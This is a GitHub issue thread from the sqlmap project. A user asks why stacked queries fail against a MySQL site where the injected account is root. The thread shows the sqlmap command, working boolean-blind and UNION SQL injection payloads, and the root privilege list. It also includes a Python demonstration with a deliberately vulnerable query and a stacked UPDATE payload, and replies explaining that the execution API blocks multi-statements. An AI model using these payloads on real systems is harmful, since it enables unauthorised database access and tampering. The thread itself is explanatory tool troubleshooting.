
About stacked queries #619

Closed
ghost opened this issue Mar 2, 2014 · 3 comments

Comments

@ghost

ghost commented Mar 2, 2014

Hello, it has been a long time since I came over here! Greetings first of all.

My question is: why can I not use stacked queries if my user has all privileges and the database is MySQL?

sqlmap -u "http://www.xxxxx.com/xxxx.php" --data="nacionalidad=E&cedula=111111111&Consultar=Consultar" -p cedula -v 6 --dbms=Mysql --risk=5 --level=3 --sql-query="UPDATE TEST"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: cedula
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: nacionalidad=E&cedula=111111111' RLIKE (SELECT (CASE WHEN (9194=9194) THEN 111111111 ELSE 0x28 END)) AND 'uaRV'='uaRV&Consultar=Consultar
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: nacionalidad=E&cedula=111111111' UNION ALL SELECT NULL,NULL,CONCAT(0x717a646e71,0x654a4a47796d704f5954,0x7172766771)#&Consultar=Consultar
Vector:  UNION ALL SELECT NULL,NULL,[QUERY]#

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[01:38:30] [INFO] fetching current user
[01:38:30] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'root@%'

[01:40:05] [INFO] fetching database users privileges
[01:40:05] [DEBUG] performed 0 queries in 0.01 seconds
database management system users privileges:
[*] 'root'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

@SQLmapTester

I think that it is not stacked queries; try running sqlmap again with the switch --technique=S

Also note that
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1), and you have entered 5

Regards to Venezuela )))

@stamparm
Member

stamparm commented Mar 2, 2014

You rarely see stacked queries if the DBMS is not PostgreSQL or MsSQL. In your
case you can forget about it.
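The reason behind the answer above is that stacked queries are gated by the query-execution API the application uses, not by the privileges of the database account: PHP's classic mysql_query() sends exactly one statement, so a ';'-separated UPDATE never reaches the server even when the account is root with all 27 privileges, while the boolean-based and UNION techniques sqlmap found still work because they live inside that single statement. The following is an added illustration, not sqlmap's code and not the poster's application. It uses Python's bundled sqlite3 as a stand-in, because its execute() likewise refuses more than one statement while executescript() (like mysqli_multi_query()) runs all of them. The table, column names and payloads are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the vulnerable application's table (hypothetical names).
SCHEMA = """
CREATE TABLE personas (id INTEGER PRIMARY KEY, cedula TEXT, nombre TEXT);
INSERT INTO personas (cedula, nombre) VALUES ('111111111', 'original');
"""

# Hypothetical attacker value for the 'cedula' parameter: a stacked UPDATE.
STACKED_PAYLOAD = "111111111'; UPDATE personas SET nombre = 'pwned' WHERE cedula = '111111111"
# Payload in the shape sqlmap reported for this target: a single-statement UNION.
UNION_PAYLOAD = "111111111' UNION ALL SELECT NULL, NULL, sqlite_version() -- "


def build_query(cedula: str) -> str:
    """Deliberately vulnerable string concatenation, like the PHP page in the thread."""
    return f"SELECT id, cedula, nombre FROM personas WHERE cedula = '{cedula}'"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def execute_app_query(payload: str, multi_statement: bool) -> dict:
    """Run the application's query with the injected value through one of two APIs.

    multi_statement=False mimics mysql_query(): one statement only, anything after
    the first ';' is rejected by the client library before the server sees it.
    multi_statement=True mimics mysqli_multi_query(): every statement is executed.
    Returns the rows fetched, any error raised, and the row value afterwards so the
    caller can see whether the stacked UPDATE actually landed.
    """
    conn = fresh_db()
    sql = build_query(payload)
    outcome = {"api": "multi" if multi_statement else "single", "rows": [], "error": None}
    try:
        if multi_statement:
            conn.executescript(sql)  # runs both SELECT and the injected UPDATE
        else:
            outcome["rows"] = conn.execute(sql).fetchall()  # single statement only
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        # sqlite3 reports "You can only execute one statement at a time." here
        # (Warning on older Python versions, ProgrammingError on newer ones).
        outcome["error"] = str(exc)
    outcome["nombre_after"] = conn.execute(
        "SELECT nombre FROM personas WHERE id = 1"
    ).fetchone()[0]
    conn.close()
    return outcome


def stacked_injection_succeeds(multi_statement: bool) -> bool:
    """True only when the injected UPDATE changed the data."""
    return execute_app_query(STACKED_PAYLOAD, multi_statement)["nombre_after"] == "pwned"


if __name__ == "__main__":
    for multi in (False, True):
        r = execute_app_query(STACKED_PAYLOAD, multi)
        print(f"stacked payload via {r['api']}-statement API: "
              f"error={r['error']!r}, nombre afterwards={r['nombre_after']!r}")
    r = execute_app_query(UNION_PAYLOAD, multi_statement=False)
    print(f"UNION payload via single-statement API: rows={r['rows']}")
```

Privileges matter once a statement reaches the server; the execution path decides whether it gets there at all. That is why sqlmap's --technique=S probing comes up empty on most PHP/MySQL targets while UNION and blind techniques succeed, and why a root account here still does not give the poster a usable UPDATE through the injection point.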

@ghost
Author

ghost commented Mar 3, 2014

Ohhh, I understand. The problem is that I am root but cannot do much, just look around, and it does not help me at all when it comes to security testing; nor can I read files despite having the full path disclosure.

And greetings and thanks for remembering my country :)

@stamparm stamparm closed this as completed Mar 3, 2014